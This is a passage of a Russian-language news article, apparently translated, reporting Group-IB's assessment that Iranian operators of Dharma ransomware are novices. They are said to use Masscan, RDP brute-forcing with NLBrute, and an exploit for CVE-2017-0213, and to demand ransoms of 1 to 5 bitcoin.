    Напротив, по его словам, иранцы, владеющие Dharma, кажутся «хакерами-новичками», использующими относительно простые методы, тактики и процедуры, такие как использование бесплатного сканера интернет-портов Masscan для поиска потенциально уязвимых хостов, а затем использование программного обеспечения под названием NLBrute для попытки взлома. грубой силой угадать допустимые учетные данные для получения удаленного подключения к хосту (см.: Не очень секретный вектор атаки групп вымогателей: эксплойты RDP ).В некоторых случаях, по его словам, злоумышленники также пытались использовать эксплойт для CVE-2017-0213, уязвимости в Windows COM Marshaler, о которой Microsoft объявила и исправила в 2017 году, для повышения привилегий.

    Получив доступ, эти злоумышленники использовали различные инструменты для бокового перемещения, прежде чем в конечном итоге бросить Dharma и записку с требованием выкупа — обычно от 1 до 5 биткойнов (от 11 800 до 59 000 долларов США) — в обмен на обещание инструмента дешифрования, Group-IB говорит.

    Скулкин говорит, что эта хакерская группа, по-видимому, не эксфильтровала данные, что вместе с «использованием недальновидных методов, которые не выходят за рамки получения денег здесь и сейчас», свидетельствует о том, что «субъекты угрозы кажутся очень незрелыми.»

    Но, как описано выше, этого нельзя сказать обо всех новых операторах и сервисах в сфере программ-вымогателей.

    Добавить комментарий

    Ваш адрес email не будет опубликован.

    2019 © Все права защищены. Карта сайта